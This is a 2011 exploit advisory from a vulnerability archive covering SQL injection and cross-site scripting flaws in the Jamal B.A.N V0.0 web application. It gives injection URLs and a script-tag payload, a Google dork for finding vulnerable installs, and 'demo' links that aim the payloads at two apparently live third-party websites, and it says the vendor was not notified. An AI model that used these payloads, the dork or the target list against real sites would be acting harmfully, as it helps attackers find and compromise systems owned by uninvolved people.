Jamal B.A.N Cross Site Scripting / SQL Injection

2011-08-19T00:00:00
ID PACKETSTORM:104179
Type packetstorm
Reporter Yassin Aboukir
Modified 2011-08-19T00:00:00

Description

                                        
                                            `  
Jamal B.A.N V0.0 Multiple Vulnerabilities  
  
----------------------------------------------------  
####  
# Author : Yassin Aboukir  
# E-mail : 01xp01@gmail.com  
# Web : Www.Yaboukir.Com  
####  
----------------------------------------------------  
  
####  
# Title : Jamal B.A.N V0.0 Multiple Vulnerabilities  
# Name : Jamal B.A.N V0.0  
# Google Dork : "All Right Reserved . Jamal B.A.N V0.0"  
# Date : 17/08/2011  
# Notified : Unnotified  
# Tested on : [Windows Seven Edition Intégral- French]  
# Category : Webapps  
####  
  
####  
#  
# Greetz : Ayoub Aboukir (Ethical Hacker) & Friends (...)  
#  
###  
  
[+] SQL Injection :  
[-] Explo!t3 :  
  
http://localhost/index.php?go=news_list&page='[SQL Attack]  
  
[+] Cross site Scripting :  
[-] Explo!t3 :  
  
http://localhost/index.php?go=player&id=>"><ScRiPt %0A%0D>alert(438443311603)%3B</ScRiPt>  
  
[+] Demos :  
http://aliraqsport.net/index.php?go=news_list&page='  
http://www.atlastimes.tk/kora/index.php?go=news_list&page='  
Or  
http://aliraqsport.net/index.php?go=player&id=>"><ScRiPt %0A%0D>alert(438443311603)%3B</ScRiPt>  
http://www.atlastimes.tk/kora/index.php?go=player&id=>"><ScRiPt %0A%0D>alert(438443311603)%3B</ScRiPt>  
  
G00d Luck All PPl ;)  
`